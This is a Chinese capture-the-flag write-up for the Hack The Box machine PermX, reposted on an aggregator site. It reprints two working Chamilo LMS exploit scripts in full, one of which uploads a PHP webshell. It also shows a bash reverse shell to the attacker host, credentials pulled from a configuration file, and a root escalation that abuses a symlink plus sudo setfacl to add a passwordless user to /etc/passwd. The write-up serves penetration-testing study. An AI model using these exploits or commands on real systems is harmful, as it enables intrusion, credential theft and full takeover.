当前位置: 首页 > news >正文

HTB:PermX[WriteUP]

news 2025/8/12 5:05:06

目录

连接至HTB服务器并启动靶机

1.How many TCP ports are listening on PermX?

使用nmap对靶机TCP端口进行开放扫描

2.What is the default domain name used by the web server on the box?

使用curl访问靶机80端口

3.On what subdomain of permx.htb is there an online learning platform?

使用ffuf对该域名进行子域名FUZZ

使用浏览器直接访问该子域

4.What is the name of the application running on `lms.permx.htb?

使用Wappalyzer查看该网站技术栈

5.What version of Chamilo is running on PermX?

使用ffuf对子域进行路径FUZZ

使用浏览器访问子域下robots.txt文件

6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?

启动Metasploit

进入CVE.MITRE.ORG网站搜索该CMS相关漏洞

7.What user is the webserver running as on PermX?

8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo?

本地侧使用nc开始监听

9.Submit the flag located in the mtz user's home directory.

USER_FLAG:7239022c6248c28ed2945734c9e07ac9

10.What is the full path to the script that the mtz user can run as any user without a password?

11./opt/acl.sh allow for changing the access control list on file in what directory? (Don't include the trailing / on the directory.)

12.Does setfacl follow symbolic links by default?(YES)

13.Submit the flag located in the root user's home directory.

ROOT_FLAG:86f2867102ba7ec4855205a4f2096539

连接至HTB服务器并启动靶机

靶机IP:10.10.11.23

分配IP:10.10.14.12

1.How many TCP ports are listening on PermX?

使用nmap对靶机TCP端口进行开放扫描

nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.23

由扫描结果可见,靶机开放端口:22、80共2个端口

2.What is the default domain name used by the web server on the box?

使用curl访问靶机80端口

curl -I 10.10.11.23:80

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I 10.10.11.23:80
HTTP/1.1 302 Found
Date: Mon, 04 Nov 2024 00:32:59 GMT
Server: Apache/2.4.52 (Ubuntu)
Location: http://permx.htb
Content-Type: text/html; charset=iso-8859-1

由输出可见,直接访问靶机IP将被重定位至:permx.htb

3.On what subdomain of permx.htb is there an online learning platform?

将靶机IP与域名进行绑定

echo '10.10.11.23 permx.htb' >> /etc/hosts

使用ffuf对该域名进行子域名FUZZ

ffuf -u http://permx.htb -H 'Host: FUZZ.permx.htb' -w ../dictionary/subdomains-top1mil-5000.txt -fc 302

再次将靶机IP与该子域进行绑定

echo '10.10.11.23 lms.permx.htb' >> /etc/hosts

使用浏览器直接访问该子域

搜索Chamilo,可见该子域:lms.permx.htb托管一个在线学习平台

4.What is the name of the application running on `lms.permx.htb?

使用Wappalyzer查看该网站技术栈

可见该页面所用WebAPP为:Chamilo(CMS)

5.What version of Chamilo is running on PermX?

使用ffuf对子域进行路径FUZZ

ffuf -u http://lms.permx.htb/FUZZ -w ../dictionary/common.txt

使用浏览器访问子域下robots.txt文件

进入documentation目录下

由该页面标题可见,该CMS版本为:1.11

6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?

对该CMS进行漏洞搜索

searchsploit Chamilo

将RCE相关的EXP拷贝到当前目录下

searchsploit -m 49867.py

查看该EXP代码

cat 49867.py 
# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)
# Date: 13/05/2021
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms
# Version: 1.11.14
# Tested on: Ubuntu 20.04.2 LTS
# CVE: CVE-2021-31933
# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/from requests import Session
from random import choice
from string import ascii_lowercaseimport requests# This is all configuration stuff,
url = "http://127.0.0.1/chamilo-lms/"  # URL to remote host web root
user_name = "admin"  # User must be an administrator
password = "admin"
command = "id;whoami"# Where you want to upload your webshell. Must be writable by web server user.
# This spot isn't protectec by .htaccess
webshell_path = 'web/'
webshell_name = f"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar" # Just a random name for webshell file
content = f"<?php echo `{command}`; ?>"def main():# Run a context manager with a session object to hold login session after loginwith Session() as s:login_url = f"{url}index.php"login_data = {"login": user_name,"password": password}r = s.post(login_url, data=login_data) # login request# Check to see if login as admin user was successful.if "admin" not in r.url:print(f"[-] Login as {user_name} failed. Need to be admin")returnprint(f"[+] Logged in as {user_name}")print(f"[+] Cookie: {s.cookies}")file_upload_url = f"{url}main/upload/upload.php"# The 'curdirpath' is not santitized, so I traverse to  the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as wellphp_webshell_file = {"curdirpath": (None, f"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}"),"user_upload": (webshell_name, content)}## Good command if you want to see what the request looks like without sending# print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))# Two requests required to actually upload the filefor i in range(2):s.post(file_upload_url, files=php_webshell_file)exploit_request_url = f"{url}{webshell_path}{webshell_name}"print("[+] Upload complete!")print(f"[+] Webshell: {exploit_request_url}")# This is a GET request to the new webshell to trigger code executioncommand_output = s.get(exploit_request_url)print("[+] Command output:\n")print(command_output.text)if __name__ == "__main__":main()

由该EXP注释可知,该EXP基于漏洞:CVE-2021-31933。好像并不是我们要找的2023漏洞

启动Metasploit

msfconsole

搜索Chamilo相关模块

search Chamilo

可见该漏洞模块无需认证可直接代码注入导致RCE,切换至该模块

use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960

查看该模块信息

info

从模块描述可见,该模块基于漏洞:CVE-2023-34960

往上一填,发现答案居然不对,才发现是要找存储型XSS漏洞

进入CVE.MITRE.ORG网站搜索该CMS相关漏洞

stored cross-site进行搜索

该漏洞允许无认证文件执行JS脚本与上传Webshell:CVE-2023-4220

7.What user is the webserver running as on PermX?

我这边直接到Github上寻找该漏洞相关EXP

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-# Name       : CVE-2023-4220
# Autor      : Insomnia (Jacob S.)
# IG         : insomnia.py
# X          : @insomniadev_
# Yt         : insomnia-dev
# Github     : https://github.com/insomnia-jacob
# Description: Automation of RCE in Chamilo LMS on affected versions of CVE-2023-4220 through a web shellimport argparse
import requests
import time
from os import system
import io# Colors
red = '\033[31m'
green = '\033[32m'
blue = '\033[34m'
yellow = '\033[93m'
reset = '\033[0m'def arguments():global argsparser = argparse.ArgumentParser()parser.add_argument( '-t', '--target', required=True ,help='Enter the target domain, for example: http://example.com' )args = parser.parse_args()def check_url_exists(url):print(blue,'\n\n[+]', reset, 'Checking if it is vulnerable.')try:response = requests.head(url + '/main/inc/lib/javascript/bigupload/files', allow_redirects=True)if response.status_code == 200:is_vuln()try:response2 = requests.head(url + '/main/inc/lib/javascript/bigupload/files/insomnia.php', allow_redirects=True)if response2.status_code == 200:print(f'Success! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php')else:upload_file(args.target)except requests.RequestException as e:print(red,f"[x] Error checking the URL: {e}")return Falseelse:print(f'Error {url}')except requests.RequestException as e:print(red,f"[x] Error checking the URL: {e}")return Falsedef upload_file(url):new_url = url + '/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'insomnia_php = """
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?phpif(isset($_GET['cmd'])){system($_GET['cmd'] . ' 2>&1');}
?>
</pre>
</body>
</html>
"""file_like_object = io.BytesIO(insomnia_php.encode('utf-8'))file_like_object.name = 'insomnia.php'  files = {'bigUploadFile': file_like_object}response3 = requests.post(new_url, files=files)print(response3.status_code)print(f'Success! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php')def is_vuln():print(red,'''
███████████████████████████
███████▀▀▀░░░░░░░▀▀▀███████
████▀░░░░░░░░░░░░░░░░░▀████
███│░░░░░░░░░░░░░░░░░░░│███
██▌│░░░░░░░░░░░░░░░░░░░│▐██
██░└┐░░░░░░░░░░░░░░░░░┌┘░██
██░░└┐░░░░░░░░░░░░░░░┌┘░░██     [*] "It is vulnerable!"
██░░┌┘▄▄▄▄▄░░░░░▄▄▄▄▄└┐░░██
██▌░│██████▌░░░▐██████│░▐██     [*] "It is vulnerable!"
███░│▐███▀▀░░▄░░▀▀███▌│░███
██▀─┘░░░░░░░▐█▌░░░░░░░└─▀██     [*] "It is vulnerable!"
██▄░░░▄▄▄▓░░▀█▀░░▓▄▄▄░░░▄██
████▄─┘██▌░░░░░░░▐██└─▄████     [*] "It is vulnerable!"
█████░░▐█─┬┬┬┬┬┬┬─█▌░░█████
████▌░░░▀┬┼┼┼┼┼┼┼┬▀░░░▐████
█████▄░░░└┴┴┴┴┴┴┴┘░░░▄█████
███████▄░░░░░░░░░░░▄███████
██████████▄▄▄▄▄▄▄██████████
███████████████████████████
''', reset)    def target(url):print(blue ,f'             URL: {url}')time.sleep(3)system("clear")    def banner():textBanner = rf"""/ __)/ )( \(  __)___(___ \ /  \(___ \( __ \ ___  / _ \(___ \(___ \ /  \ 
( (__ \ \/ / ) _)(___)/ __/(  0 )/ __/ (__ ((___)(__  ( / __/ / __/(  0 )\___) \__/ (____)   (____) \__/(____)(____/       (__/(____)(____) \__/ 
"""print(green,textBanner)print(yellow,'                                                                            by Insomnia (Jacob S.)')def main():arguments()banner()target(args.target)check_url_exists(args.target)if __name__ == '__main__':main()

直接使用该EXP开始漏洞利用

python exploit.py -t http://lms.permx.htb/

直接访问EXP提供的URL,执行whoami命令

由回显可见,当前用户为:www-data

8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo?

本地侧使用nc开始监听

nc -lvnp 1425

通过EXP提供的Webshell反弹shell

bash -c 'bash -i >& /dev/tcp/10.10.14.12/1425 0>&1'

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.23] 53550
bash: cannot set terminal process group (1173): Inappropriate ioctl for device
bash: no job control in this shell
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$ whoami
<ilo/main/inc/lib/javascript/bigupload/files$ whoami                     
www-data

提升TTY

script -c /bin/bash -q /dev/null

搜索WebAPP下所有可能的配置相关文件并输出为列表

find /var/www/chamilo -name 'conf*' -type f 2>/dev/null | tee res.txt

逐个查看文件内容,并匹配'password'字段

cat res.txt | xargs -I {} sh -c 'cat {} | grep "password"'

查询该字段出处:03F6lY3uXAP2bkW8

xargs -I {} sh -c 'grep -m1 "03F6lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt

www-data@permx:/var/www/chamilo$ xargs -I {} sh -c 'grep -m1 "03F6lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt
<lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
Found in /var/www/chamilo/app/config/configuration.php

从该文件中找出匹配字符串并输出上下5行

grep -C 5 '03F6lY3uXAP2bkW8' /var/www/chamilo/app/config/configuration.php

www-data@permx:/var/www/chamilo$ grep -C 5 '03F6lY3uXAP2bkW8' /var/www/chamilo/app/config/configuration.php
<bkW8' /var/www/chamilo/app/config/configuration.php
// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;

/**
 * Directory settings.

账户:chamilo

密码:03F6lY3uXAP2bkW8

总结一下,该文件存储着数据库连接信息:/var/www/chamilo/app/config/configuration.php

9.Submit the flag located in the mtz user's home directory.

查看靶机支持登录的用户

cat /etc/passwd

尝试使用该用户对靶机进行SSH服务登录

ssh mtz@10.10.11.23

查询user_flag位置并查看其内容

mtz@permx:~$ find / -name 'user.txt' 2>/dev/null
/home/mtz/user.txt
mtz@permx:~$ cat /home/mtz/user.txt
7239022c6248c28ed2945734c9e07ac9

USER_FLAG:7239022c6248c28ed2945734c9e07ac9

10.What is the full path to the script that the mtz user can run as any user without a password?

查看该用户可无密码特权运行的命令

sudo -l

mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh

存在文件可无密码特权运行:/opt/acl.sh

11./opt/acl.sh allow for changing the access control list on file in what directory? (Don't include the trailing / on the directory.)

通过脚本内容可知,该脚本运行后允许在/home/mtz目录下赋任意链接任意权限

12.Does setfacl follow symbolic links by default?(YES)

13.Submit the flag located in the root user's home directory.

尝试创建连接test,连接至/etc/passwd

ln -s /etc/passwd /home/mtz/test

通过/opt/acl.sh脚本为/home/mtz/test链接赋读写权限

sudo /opt/acl.sh mtz rw /home/mtz/test

mtz@permx:~$ ln -s /etc/passwd /home/mtz/test
mtz@permx:~$ ls
priv  test  user.txt
mtz@permx:~$ sudo /opt/acl.sh mtz rw /home/mtz/test

/home/mtz/test链接中写入新用户

echo '0dayhp::0:0:0dayhp:/root:/bin/bash' >> /home/mtz/test

切换到0dayhp用户bash

su 0dayhp

查找root_flag位置并查看其内容

root@permx:/home/mtz# find / -name 'root.txt'
/root/root.txt
/var/www/chamilo/vendor/symfony/intl/Tests/Data/Bundle/Reader/Fixtures/txt/root.txt
root@permx:/home/mtz# cat /root/root.txt
86f2867102ba7ec4855205a4f2096539

ROOT_FLAG:86f2867102ba7ec4855205a4f2096539

http://www.lryc.cn/news/477805.html

相关文章:

  • uniapp 整合 OpenLayers - 使用modify修改要素
  • JMeter快速造数之数据导入导出
  • 框架学习01-Spring
  • Java | Leetcode Java题解之第539题最小时间差
  • 126页PPT麦肯锡战略实施与成本优化:质效提升与精益采购实践
  • Modbus解析流程全面升级:体验全新核心与终极优化!
  • 【MWorks】Ubuntu 系统搭建
  • 安装Element-Plus与v-model在vue3组件中的使用
  • Qt学习笔记第41到50讲
  • 加固筑牢安全防线:多源威胁检测响应在企业网络安全运营中的核心作用
  • 用Python将PDF表格提取到文本、CSV和Excel文件中
  • AIGC在游戏设计中的应用及影响
  • 给初学者的 Jupyter Notebook 教程
  • 搜维尔科技:Xsens和BoB助力生物力学教育
  • Vue动态计算Table表格的高度
  • 【MongoDB】MongoDB的聚合(Aggregate、Map Reduce)与管道(Pipline) 及索引详解(附详细案例)
  • 数组和字符串的es6新方法使用和综合案例
  • JS语法进阶第一课!—DOM(重点)
  • Swift 开发教程系列 - 第5章:集合类型
  • Spring:Bean(创建方式,抽象继承,工厂Bean,生命周期)
  • Flutter中的Extension关键字
  • transformers 框架使用详解,bert-base-chinese
  • STM32——ADC
  • Unity SRP学习笔记(二)
  • 数据库第五次作业
  • 健身房业务流程优化:SpringBoot解决方案
  • 【产品经理】工业互联网企业上市之路
  • Java学习教程,从入门到精通,Java对象和类语法知识点(20)
  • 金融场中的量化交易:民锋数据驱动策略的优势解析市
  • Docker 配置镜像加速